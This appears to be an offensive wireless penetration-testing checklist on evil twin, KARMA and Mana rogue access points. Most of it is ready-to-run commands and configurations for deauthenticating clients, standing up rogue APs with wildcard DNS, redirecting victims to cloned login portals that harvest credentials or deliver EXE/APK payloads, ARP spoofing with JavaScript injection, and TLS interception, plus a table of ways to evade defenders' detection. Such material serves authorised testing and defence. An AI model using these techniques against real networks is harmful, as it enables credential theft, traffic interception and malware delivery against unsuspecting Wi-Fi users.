Evil Twin / KARMA / Mana
Stand up an AP that looks like (or is more attractive than) the legitimate target. Clients associate, you become their gateway, you intercept everything. The classic "captive portal at the airport" attack pattern, scaled to whatever the engagement requires.
Quick Workflow
- Discover target ESSID(s) clients are looking for (PNL — Preferred Network List)
- Stand up rogue AP advertising matching ESSID(s)
- (Optional) Deauth clients off legitimate AP to push them toward yours
- Run captive portal / transparent MITM
- Capture creds, deliver payload, or harvest sessions
Variants
| Variant | Mechanic | Use Case |
|---|---|---|
| Evil Twin | Same ESSID + BSSID as legit AP | Open or PSK-known networks (ISP cafe Wi-Fi, public guest) |
| KARMA | Respond "yes" to every probe request | Clients with broad PNLs (most older devices) |
| Mana | Respond selectively to probes per-client | KARMA-aware MAC randomization defenses |
| Known Beacons | Beacon a list of likely-known ESSIDs | Wide-net attraction without seeing probes first |
| Captive Portal | Force splash page on association | Phishing, payload delivery |
Open / PSK-Known Evil Twin
Use when you know (or have cracked) the PSK.
# wifiphisher — opinionated automation including portal templates
sudo wifiphisher --essid CorpWiFi --noextensions --force-hostapd
# airgeddon (interactive menu, good for one-off)
sudo airgeddon
# → Evil Twin attacks menu → Captive Portal
# Manual: hostapd + dnsmasq + iptables redirect
cat > /tmp/hostapd.conf <<EOF
interface=wlan0
driver=nl80211
ssid=CorpWiFi
hw_mode=g
channel=6
auth_algs=1
wpa=2
wpa_passphrase=KnownPSK
wpa_key_mgmt=WPA-PSK
rsn_pairwise=CCMP
EOF
sudo hostapd /tmp/hostapd.conf &
# DHCP/DNS via dnsmasq
cat > /tmp/dnsmasq.conf <<EOF
interface=wlan0
dhcp-range=10.10.10.10,10.10.10.50,12h
dhcp-option=3,10.10.10.1
dhcp-option=6,10.10.10.1
address=/#/10.10.10.1 # wildcard DNS to attacker
EOF
sudo dnsmasq -C /tmp/dnsmasq.conf -d
KARMA — Universal Probe Response
# hostapd-mana with KARMA mode enabled (mana_mode=1)
cat > /tmp/karma.conf <<EOF
interface=wlan0
ssid=KARMA
hw_mode=g
channel=6
mana_loud=1
mana_macacl=0
EOF
sudo hostapd-mana /tmp/karma.conf
Modern clients with MAC randomization probe with random MACs and a randomized PNL — KARMA's universal-yes response is now triggers on probes the client wouldn't actually associate to. Use Mana for better selectivity.
Mana — Selective Per-Client Response
# hostapd-mana (default mode is mana, not loud)
cat > /tmp/mana.conf <<EOF
interface=wlan0
ssid=Free-WiFi
hw_mode=g
channel=6
mana_mode=1
mana_macacl=0
mana_outfile=/tmp/mana.log
EOF
sudo hostapd-mana /tmp/mana.conf
Mana tracks MAC → ESSID-probe-list. When that MAC associates, Mana picks one realistic ESSID from its observed probe list and responds consistently. Defeats KARMA-aware client-side mitigations.
Known Beacons Attack
# eaphammer can broadcast a list of likely-known ESSIDs as actual beacons
eaphammer --essid-file likely_essids.txt --hostile-portal
# likely_essids.txt: airport, cafe, hotel, office defaults from open intel
Beacons attract spontaneous association from devices whose PNLs include these names. Useful when you don't see probes (modern devices broadcast fewer probes than they used to).
Deauth Coercion
Push existing clients off legitimate AP to your evil twin:
# On a different interface (or after stopping airbase-ng)
sudo aireplay-ng --deauth 10 -a <legitimate-BSSID> wlan0_mon2
Combined with stronger signal (closer position) or higher TX power on your AP, the client roams to you on reconnection.
Detection trade-off: broadcast deauth is loud; targeted single-client deauth is quieter. PMF (802.11w) blocks unencrypted deauth — see offensive-deauth-disassoc.
Captive Portal / Credential Capture
# Portal options in eaphammer / wifiphisher / airgeddon include:
# - Generic OAuth-style (Google/MS/Facebook clones)
# - Vendor router login pages (matched to nearby AP brand)
# - Corporate-themed portal harvesting AD creds
# - Update-required prompts delivering EXE/APK payloads
# Custom: simple Flask+iptables setup
iptables -t nat -A PREROUTING -i wlan0 -p tcp --dport 80 -j DNAT --to-destination 10.10.10.1:8080
iptables -t nat -A POSTROUTING -j MASQUERADE
python3 -m flask run --host=10.10.10.1 --port=8080
For high-fidelity portals, mirror the legitimate captive portal's HTML/CSS exactly. Most users skim, don't read URLs.
Post-Association MITM
Once a client associates and you're their gateway:
# Transparent TLS MITM (requires CA cert install on client OR clients with MITM-able apps)
mitmproxy --mode transparent --showhost --ssl-insecure
# Bettercap full pipeline (sniff, ARP, DNS, JS injection)
sudo bettercap -iface wlan0 -eval "set arp.spoof.targets *; arp.spoof on; net.sniff on; http.proxy on"
Without portal-level CA install, modern HTTPS / HSTS / certificate pinning prevents most TLS interception. Useful targets:
- Captive portal cleartext flows
- Apps with broken pinning (run
offensive-mobileskills against the app) - Plain-HTTP services still in use (legacy IoT, old mgmt panels)
- DNS hijack (return attacker IPs for non-pinned services)
MAC Randomization Defeat
iOS, recent Android, and Windows 11 randomize MACs per network. They still leak per-network stable identifiers in:
- Per-SSID MAC consistency (same MAC for same SSID over time)
- Probe sequence numbers
- 802.11 IE order (manufacturer fingerprint)
# Cluster probes to track devices across MACs
hcxdumptool -i wlan0mon --enable_status=15 --rds=2
# Analyze with hcxhash2cap / wifite-style fingerprinting
Detection Considerations
| Defender Signal | Mitigation by Attacker |
|---|---|
| Rogue AP detection (BSSID not in WIPS allow-list) | Match real BSSID exactly + suppress own AP advertisement |
| KARMA pattern (single AP responding to many ESSIDs) | Use Mana mode |
| RSSI delta (your AP closer than legit) | Run from a distance, lower TX power |
| Beacon timing inconsistency vs real AP | Match beacon interval, IE order |
| Captive portal HTML differs from real portal | Mirror exactly, refresh weekly |
Modern enterprise WIPS will flag KARMA almost immediately. Mana + matched BSSID is harder to detect without active de-cloaking by defenders.
Engagement Cheatsheet
# 1. Recon — passive observe target ESSIDs and clients (no probes from you)
sudo airodump-ng wlan0mon -w probes
# 2. Pick mode based on environment
# - PSK known + co-located: spoofed BSSID + matched PSK + targeted deauth
# - Open networks (cafe, airport): straight evil twin or KARMA
# - Heterogeneous device population: Mana
# 3. Stand up rogue AP
sudo hostapd-mana /tmp/mana.conf
sudo dnsmasq -C /tmp/dnsmasq.conf
# 4. Captive portal / payload delivery / MITM
mitmproxy --mode transparent --showhost --ssl-insecure
# 5. Coerce specific clients if needed (deauth on legit AP)
# 6. Document captures, sessions, and time-on-target
Key References
- hostapd-mana: github.com/sensepost/hostapd-mana
- wifiphisher: wifiphisher.org
- airgeddon: github.com/v1s1t0r1sh3r3/airgeddon
- KARMA / Mana original talks (DEF CON, Sensepost research)
- "Probing into the Past" research on PNL exploitation
- Source: https://github.com/SnailSploit/offensive-checklist/blob/main/wireless.md